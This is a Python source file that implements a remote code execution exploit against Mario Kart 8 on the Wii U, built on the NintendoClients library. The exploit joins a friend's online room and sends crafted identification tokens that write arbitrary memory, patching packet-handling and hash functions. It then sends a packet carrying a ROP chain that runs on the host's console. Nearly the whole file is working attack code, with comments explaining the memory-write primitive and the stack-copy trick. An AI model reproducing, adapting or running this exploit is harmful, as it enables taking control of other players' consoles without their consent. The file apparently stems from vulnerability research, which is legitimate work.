from nintendo.nex import backend, authentication, matchmaking
from nintendo.pia.station import IdentificationInfo
from nintendo.pia.session import PIASession
from nintendo.account import AccountAPI
from nintendo.games import MK8
import struct
import time

import logging
# logging.basicConfig(level=logging.DEBUG)


def runExploit(DEVICE_ID, SERIAL_NUMBER, SYSTEM_VERSION, REGION, COUNTRY,
               USERNAME, PASSWORD, FRIEND_NAME, rop_chain):
    """Join a friend's room and deliver ``rop_chain`` to the room host.

    Parameters:
        DEVICE_ID, SERIAL_NUMBER, SYSTEM_VERSION, REGION, COUNTRY:
            Forwarded unchanged to ``AccountAPI.set_device``.
        USERNAME, PASSWORD: Credentials passed to ``AccountAPI.login``.
            USERNAME is also used to look up the local PID and Mii name.
        FRIEND_NAME: Account name whose playing session is looked up
            and joined.
        rop_chain: List of integers. It is appended to nine zero words and
            packed as big-endian unsigned 32-bit values into the final packet.

    Raises:
        RuntimeError: If no playing session is found for FRIEND_NAME.

    The game-server connection is closed when the function exits, whether it
    finishes normally or an exception is raised after login.
    """
    # A packet may contain more than 1000 bytes,
    # enough room to build a nice ROP chain
    rop_payload_start = [
        0, 0, 0, 0, 0, 0, 0, 0, 0,
    ]
    rop_payload = rop_payload_start + rop_chain

    # for i in range(len(rop_payload)):
    #     print("%3d: %08X" % (i, rop_payload[i]))

    # Log in on account server
    api = AccountAPI()
    api.set_device(DEVICE_ID, SERIAL_NUMBER, SYSTEM_VERSION, REGION, COUNTRY)
    api.set_title(MK8.TITLE_ID_EUR, MK8.LATEST_VERSION)
    api.login(USERNAME, PASSWORD)

    my_pid = api.get_pid(USERNAME)
    friend_pid = api.get_pid(FRIEND_NAME)
    mii_name = api.get_mii(my_pid).name

    # Connect to game server
    nex_token = api.get_nex_token(MK8.GAME_SERVER_ID)
    mybackend = backend.BackEndClient(MK8.ACCESS_KEY, MK8.NEX_VERSION)
    mybackend.connect(nex_token.host, nex_token.port)
    mybackend.login(
        nex_token.username, nex_token.password
    )

    # Everything below runs with an open, logged-in backend connection.
    # The try/finally guarantees it is closed even when a step fails
    # (for example when the friend room cannot be found).
    try:
        matchmake_ext = matchmaking.MatchmakeExtensionClient(mybackend)

        # 0x387E0A1C - 0x387E0640

        # Find friend room
        playing_sessions = matchmake_ext.get_playing_session([friend_pid])
        if not playing_sessions:
            raise RuntimeError(
                "Couldn't find friend room for %s" % FRIEND_NAME
            )
        gathering = playing_sessions[0].gathering

        # Request session key (for p2p)
        session_key = matchmake_ext.join_matchmake_session(
            gathering.id, "This is NintendoClients"
        )

        matchmaker = matchmaking.MatchMakingClient(mybackend)
        session_urls = matchmaker.get_session_urls(gathering.id)

        # Constructs an identification token that writes
        # an arbitrary value at an arbitrary address
        def write(addr, value):
            """Pack the 32-byte identification token for one (addr, value)."""
            func = 0xE8A26D4
            dummy = 0xAAAAAAAA
            strbuf = 0x386043D8
            vtable = 0x386042D4
            return struct.pack(
                ">IIIIIIII", addr - 0xC, func, dummy, dummy,
                strbuf, vtable, dummy, value
            )

        # The ability to write an arbitrary value at an arbitrary address is
        # a powerful tool. It's easy to patch a virtual function for example:
        # you simply need to overwrite its function pointer in its vtable.
        # I'll briefly explain how this exploit turns this into a ROP chain.
        #
        # Md5Context::GetHashSize is called when the console checks the
        # signature of an incoming packet, and when it appends a signature to
        # an outgoing packet. Although GetHashSize doesn't take any
        # parameters, r4 always contains the content of the packet when it is
        # called, and r5 contains the size of the packet. This exploit
        # redirects Md5Context::GetHashSize to the following piece of code:
        #     ...
        #     addi r3, r1, 8
        #     bl memcpy
        #     ...
        # The next packet we send to the console after patching
        # Md5Context::GetHashSize will be copied onto the stack, and the ROP
        # chain starts as soon as Md5Context::GetHashSize returns.
        #
        # There are two issues with this approach:
        #   - The console may try to send a packet before it receives our
        #     ROP packet
        #   - The console might receive a packet from someone else before it
        #     receives our ROP packet
        # Both cases cause a normal packet to be copied onto the stack and
        # crash the console. This exploit works around the first issue by
        # patching StationPacketHandler::AssignPacket to always return 0.
        # This stops the console from trying to send any packets. The second
        # issue is the reason that this exploit only works when there are no
        # other players in the friend room.
        injections = [
            (0x1066f9b8, 0xEBC0314),  # StationPacketHandler::AssignPacket -> return 0
            (0x1066889c, 0xEBE6624)   # Md5Context::GetHashSize -> memcpy on stack
        ]

        # Create a packet with a valid header but whose body contains a
        # ROP chain
        rop_packet = b"\x32\xAB\x98\x64\x01\x00\x00\x00"
        rop_packet += struct.pack(">%iI" % len(rop_payload), *rop_payload)

        # Initialize P2P session
        session = PIASession(mybackend, session_key)
        session.start(
            write(*injections[0]),  # Identification token that performs the first injection
            mii_name
        )

        # Because we won't receive any packets from the console after
        # patching StationPacketHandler::AssignPacket, we need to guess what
        # the console expects.

        # Send a packet that 'expects' an acknowledgement
        # but don't wait for the acknowledgement
        def send_with_ack(station, message):
            """Append the next ack id to the payload and send it once."""
            ack_id = next(session.resending_transport.ack_id) & 0xFFFFFFFF
            message.payload += struct.pack(">I", ack_id)
            session.transport.send(station, message)

        # Connect to session host
        host = session.connect_to_host(session_urls)
        # Replace the resending transport's send so nothing blocks on an
        # acknowledgement that will never arrive.
        session.resending_transport.send = send_with_ack
        session.mesh_protocol.send_join_request(host)  # First injection
        time.sleep(1)  # Wait for join response

        # Replace identification token for second memory injection
        session.station.identification_info = \
            IdentificationInfo(write(*injections[1]), mii_name)

        # From now on we won't receive any packets from the console so
        # we have to do things manually.

        # Disconnect and reconnect to host
        session.station_protocol.send_disconnection_request(host)
        session.station_protocol.send_connection_request(host)
        time.sleep(0.1)
        ack_id = next(session.resending_transport.ack_id) & 0xFFFFFFFF
        session.station_protocol.send_ack(host, struct.pack(">I", ack_id))
        session.station_protocol.send_connection_response(host)
        time.sleep(0.1)
        ack_id = next(session.resending_transport.ack_id) & 0xFFFFFFFF
        session.station_protocol.send_ack(host, struct.pack(">I", ack_id))
        time.sleep(1)

        # Send join request, performing the second memory injection
        session.mesh_protocol.send_join_request(host)
        time.sleep(1)

        # Finally, send packet with ROP chain
        session.transport.transport.socket.send(rop_packet, host.address)
    finally:
        # Disconnect from game server
        mybackend.close()